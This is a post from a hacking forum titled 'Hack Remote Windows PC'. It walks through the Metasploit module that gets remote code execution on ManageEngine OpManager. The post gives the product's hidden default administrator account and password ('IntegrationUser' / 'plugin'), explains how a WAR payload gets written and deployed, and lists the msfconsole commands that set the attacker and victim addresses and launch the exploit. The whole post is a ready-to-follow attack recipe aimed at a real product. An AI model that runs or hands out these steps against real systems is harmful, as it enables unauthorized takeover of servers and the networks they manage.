• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Remote Windows PC using ManageEngine OpManager Remote Code Execution

naradjey

Neural Interface Developer
N Rep
0
0
0
Rep
0
N Vouches
0
0
0
Vouches
0
Posts
129
Likes
145
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 100 XP
This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account “IntegrationUser” with administrator privileges exists. The account has a default password of “plugin” which can not be reset through the user interface. By log-in and abusing the default administrator’s SQL query functionality, it’s possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.5 and v11.6 for Windows.

Exploit Targets

Windows 7

ManageEngine OpManager v11.6

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

1.png


Now type use exploit/windows/http/manage_engine_opmanager_rce

msf exploit (manage_engine_opmanager_rce)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (manage_engine_opmanager_rce)>set rhost 192.168.0.104

msf exploit (manage_engine_opmanager_rce)>exploit

2.png
 

452,496

332,845

332,853

Top